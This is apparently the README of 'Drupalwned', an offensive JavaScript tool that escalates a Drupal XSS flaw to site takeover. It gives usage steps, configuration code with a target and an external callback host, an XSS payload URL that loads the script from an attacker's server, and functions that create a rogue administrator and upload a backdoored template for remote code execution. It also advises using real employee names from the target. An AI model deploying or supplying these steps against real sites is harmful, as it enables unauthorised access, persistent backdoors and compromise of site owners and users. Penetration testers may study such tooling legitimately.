Drupal Exploitation Script that elevate XSS to RCE or Others Critical Vulnerabilities.

About - Key Features - How To Use - Examples - Contributing

About

Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in Drupal CMS.

💧 This script provides support for Drupal Versions 7.X.X, 8.X.X, 9.X.X and 10.X.X. 💧

Key Features

• Privilege Escalation
  • Creates an administrative user in Drupal.
• (RCE) Upload Template
  • Upload custom templates backdoored to Drupal.
• // Pending
  • more ways to get RCE

How To Use

Example.mp4

1) Clone the Repository

git clone https://github.com/nowak0x01/Drupalwned

2) Edit the script by selecting the desired function and modifying its variable values. (Example: DPCreateAccount)

// ************************************ ~% Variables %~ ************************************ //

var Target = "https://172.17.0.1:8000/"; // Ex: https://192.168.84.212:8000/drupal/
var Callback = "http://zfi0g0xtiqb6qjh564xr92xnxe35rvfk.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

// DPCreateAccount(); // (Privilege Escalation) - Creates an Administrative user in Drupal.
// DPUploadTemplate(); // (RCE) - Upload a Template module (backdoor) to Drupal.

function DPCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Email = "nowak@example.com";  // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
    var Username = "nowak";         // (It is recommended to use a valid employee name from the target company). - <Mandatory>
    var Password = `j^QEkyvd7*g3`;  /* - <Mandatory> 
                            Make it at least 12 characters
                            Add lowercase letters
                            Add uppercase letters
                            Add numbers
                            Add punctuation
                                    */
    /* ************************************************************************************************************************************************ */

3) Start a web server

python3 -m http.server 80

4) Go to the Drupal XSS vector and include drupalwned.js

https://drupal.example.com/plugin.php?s=<script%20src="//VPS/drupalwned.js"></script>

Examples

🌧️ DPCreateAccount() - Creates an user in Drupal.

CreateAccount.mp4

⛅ DPUploadTemplate() - Upload a custom template backdoored to Drupal.

UploadTemplate.mp4

Contributing

If you're interested in contributing, enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.

               r
               ain
               rai
              nrain
             rainrai
            nrainrain
           ainrainrain
          rainrainrainr
         ainrainrainrain
        rainrainrainrainr
      ainrainrainrainrainra         Drupalwned (https://github.com/nowak0x01/Drupalwned)
    inra nrainrainrainrainrai                      @Author: Hudson Nowak
  nrain  inrainrainrainrainrain
 rain   nrainrainrainrainrainrai
nrai   inrainrainrainrainrainrain
rai   inrainrainrainrainrainrainr
rain   nrainrainrainrainrainrainr
 rainr  nrainrainrainrainrainrai
  nrain ainrainrainrainrainrain
    rainrainrainrainrainrainr
      rainranirainrainrainr
           ainrainrain